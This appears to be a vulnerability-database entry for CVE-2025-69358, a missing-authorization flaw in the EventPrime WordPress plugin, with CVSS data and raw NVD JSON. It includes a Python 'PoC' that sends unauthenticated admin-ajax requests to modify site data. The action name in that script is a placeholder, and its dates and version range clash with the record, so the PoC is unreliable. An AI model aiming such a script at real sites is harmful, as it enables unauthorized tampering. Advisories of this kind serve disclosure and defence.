Security Vulnerability Report
中文
CVE-2025-69358 CVSS 7.5 HIGH

CVE-2025-69358

Published: 2026-03-25 17:16:28
Last Modified: 2026-04-27 19:16:43

Description

Missing Authorization vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EventPrime: from n/a through <= 4.2.6.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Metagauss EventPrime <= 4.2.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: EventPrime < 4.2.6.0 - Missing Authorization (PoC) # Date: 2025-03-25 # CVE: CVE-2025-69358 def exploit_missing_auth(target_url): """ This script demonstrates the missing authorization vulnerability. It attempts to perform an action without authentication. """ # The vulnerable endpoint is typically wp-admin/admin-ajax.php ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload data based on the vulnerability description # Note: The specific 'action' parameter depends on the vulnerable function in the plugin payload = { "action": "ep_some_vulnerable_action", # Replace with actual action name from analysis "param1": "malicious_data" } try: print(f"[*] Sending unauthenticated request to {ajax_url}...") response = requests.post(ajax_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if data was modified.") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": target = "http://example-site.com" # Replace with target exploit_missing_auth(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69358", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:27.830", "lastModified": "2026-04-27T19:16:42.633", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EventPrime: from n/a through <= 4.2.6.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Metagauss EventPrime eventprime-event-calendar-management permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a EventPrime: desde n/a hasta &lt;= 4.2.6.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-6-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}